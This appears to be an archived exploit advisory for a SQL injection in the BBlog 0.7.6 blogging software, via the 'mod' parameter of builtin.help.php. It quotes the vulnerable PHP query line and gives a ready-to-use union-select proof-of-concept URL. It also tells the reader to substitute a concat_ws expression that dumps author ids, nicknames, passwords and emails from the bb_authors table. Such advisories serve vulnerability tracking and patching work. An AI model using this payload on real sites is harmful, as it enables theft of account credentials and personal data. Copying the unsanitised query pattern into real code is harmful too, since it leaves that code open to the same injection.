[] NeoSense

BBlog 0.7.6 - 'mod' SQL Injection

Author: IP-Sh0k
type: webapps
platform: php
port: 
date_added: 2008-08-11 
date_updated: 2016-12-15 
verified: 1 
codes: OSVDB-48830;CVE-2008-4436 
tags: 
aliases:  
screenshot_url:  
application_url: 

#######################################################
########## BBlog 0.7.6 SQL Injection Vuln #############
#######################################################
#
# Vulnpath: /bblog_plugins/builtin.help.php
#
# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");
#
#
#
# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--
#
# help: On the number you can see you have to set:
#       concat_ws(0x3a,id,nickname,password,email,icq)
#
#
# Found by: IP-Sh0k
#######################################################

# milw0rm.com [2008-08-12]